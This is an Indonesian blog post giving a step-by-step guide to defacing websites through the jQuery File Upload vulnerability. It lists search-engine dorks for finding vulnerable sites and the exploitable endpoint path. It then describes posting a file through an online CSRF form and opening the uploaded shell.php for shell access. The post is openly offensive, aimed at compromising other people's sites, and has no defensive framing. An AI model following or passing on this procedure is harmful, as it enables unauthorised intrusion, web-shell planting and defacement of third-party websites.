Cara Deface Dengan Method jQuery File Upload Vulnerability

Jumat, 20 Januari 2017

Cara Deface Dengan Method jQuery File Upload Vulnerability

15.37.00 No Comments
Vuln


HumarTutor - Cara Deface Dengan Method jQuery File Upload Vulnerability

 Mungkin jQuery File Upload adalah cara mudah buat deface, dengan upload saja seh.

Yang susah ya dork nya, kudu pinter pinter kalo pengen buat nemu yang vuln

Syarat :

1. Dork :
inurl:/assets/global/plugins/jquery-file-upload/
inurl:/jquery-file-upload/

2. Exploit
/server/php/index.php

contoh
site.com/assets/global/plugins/jquery-file-upload/server/php/index.php

3. CSRF
untuk CSRF pake yang online aja biar gampang

Post file? files[]

Langkah :

1. Dorking dulu





2. Nemu? exploit dulu
Blank?? skip

Vuln? setidaknya ada tulisan kayak gambar dibawah

Vuln
foto : ken7ester

3. Pake CSRF Online
Post file? files[]


Online

4. Shell Access ??

site.com/assets/global/plugins/jquery-file-upload/server/php/files/shell.php


Title :

Cara Deface Dengan Method jQuery File Upload Vulnerability

Reviewed by

Humar

On

15.37.00

Rating :

5

Share this

Humar

I'm a blogger wannabe, programmer wannabe, and hacker wannabe

0 Comment to "Cara Deface Dengan Method jQuery File Upload Vulnerability"

Posting Komentar

Silahkan berkomentar jika ada yang kurang paham tentang artikel di atas.
Jangan lupa centang "Beri tahu saya" untuk mendapatkan update balasan dari kami dan berkomentarlah dengan sopan.
Terima kasih.

Langganan: Posting Komentar (Atom)